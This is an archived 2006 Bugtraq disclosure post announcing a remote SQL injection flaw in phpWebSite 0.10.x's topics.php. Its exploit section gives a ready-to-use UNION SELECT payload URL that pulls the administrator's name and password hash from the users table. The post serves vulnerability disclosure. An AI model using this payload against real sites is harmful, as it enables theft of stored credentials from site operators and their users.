lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: 12 Apr 2006 21:40:53 -0000
From: selfar2002@...mail.com
To: bugtraq@...urityfocus.com
Subject: phpWebSite  0.10.? (topics.php) Remote SQL Injection Exploit


---------------------------------------------------------------------------
phpWebSite <= 0.10.? (topics.php) Remote SQL Injection Exploit
---------------------------------------------------------------------------
Discovered By SnIpEr_SA
Author    : SnIpEr_SA
Exploit in Perl : http://www.milw0rm.com/exploits/1525
Remote  :  Yes  
Local     :  No  
Critical Level : Dangerous
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : phpWebSite
version     : 0.10.?
URL         : http://phpwebsite.appstate.edu/
... 
------------------------------------------------------------------ 
Exploit:
~~~~~~~~ 
# http://example.com/path/topics.php?op=viewtopic&topic=-1 Union select name,name,pass,name From users where uid=1

--------------------------------------------------------------------------- 
Contact:
 ~~~~~~~~
 SnIpEr_SA
E-mail: selfar2002@...mail.com
E-mail: SnIpEr_SA[at]Basdmail[dot]org
Homepage: http://www.3asfh.com/  & http://www.lezr.com/
Greetz: All My Frind
 -------------------------------- [ EOF ] ----------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ